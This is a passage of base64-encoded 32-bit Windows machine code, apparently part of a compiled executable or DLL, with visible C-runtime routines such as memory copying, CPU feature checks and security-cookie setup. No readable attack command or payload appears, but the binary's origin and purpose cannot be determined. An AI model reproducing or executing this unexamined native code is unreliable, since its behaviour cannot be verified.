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oAAIvwiXXkx0X8/v///+gNAAAAi8boYOf//8IMAIt15ItFEP8w6BYxAABZw4v/VYvsg+wMi0UIjU3/iUX4iUX0jUX4UP91DI1F9FDoi////4vlXcOL/1WL7IHshAQAAKEYYAoQM8WJRfyDfRgAi0UQU4tdFImFoPv//3UY6PzeAADHABYAAADoutsAAIPI/+kRAQAAhdt0BIXAdOBWV/91HI2NfPv//+hrCQAAi00Ijb2Q+///M8Az0qurq6uLwYu9oPv//4PgAomFjPv//wvCib2Q+///iZ2U+///iZWY+///dQqIlZz7//+F/3UHxoWc+///Af91II2FkPv//4mFoPv//42FgPv//1D/dRiNhaD7////dQxRUI2NpPv//+iJCAAAjY2k+///6HMMAACL8IX/dEuLRQgzyYPgAQvBdByF23UEhfZ1b4uFmPv//zvDdSqF9ngpO/N2Jetbi4WM+///C8F0TYXbdBWF9nkEiA/rDYuFmPv//zvDdE2IDAeNjeT7///oDwkAAIC9iPv//wB0DYuNfPv//4OhUAMAAP1fi8Zei038M81b6Inn//+L5V3Dhdt1BYPO/+vDi4WY+///O8N1tmr+XohMH//rsIv/VYvsgeyEBAAAoRhgChAzxYlF/IN9GACLRRBTi10UiYWg+///dRjogN0AAMcAFgAAAOg+2gAAg8j/6RcBAACF23QEhcB04FZX/3UcjY18+///6O8HAACLTQiNvZD7//8zwDPSq6urq4vBi72g+///g+ACiYWM+///C8KJvZD7//+JnZT7//+JlZj7//91CoiVnPv//4X/dQfGhZz7//8B/3UgjYWQ+///iYWg+///jYWA+///UP91GI2FoPv///91DFFQjY2k+///6EIHAACNjaT7///oPw0AAIvwhf90UYtFCIPgAYPIAHQchdt1BIX2dXaLhZj7//87w3UuhfZ4MDvzdizrYouFjPv//4PIAHRThdt0G4X2eQczwGaJB+sQi4WY+///O8N0UDPJZokMR42N5Pv//+iNBwAAgL2I+///AHQNi418+///g6FQAwAA/V+Lxl6LTfwzzVvoB+b//4vlXcOF23UFg87/68OLhZj7//87w3Wzav5eM8BmiURf/uuti/9Vi+yB7IQEAAChGGAKEDPFiUX8g30YAItFEFOLXRSJhaD7//91GOj72wAAxw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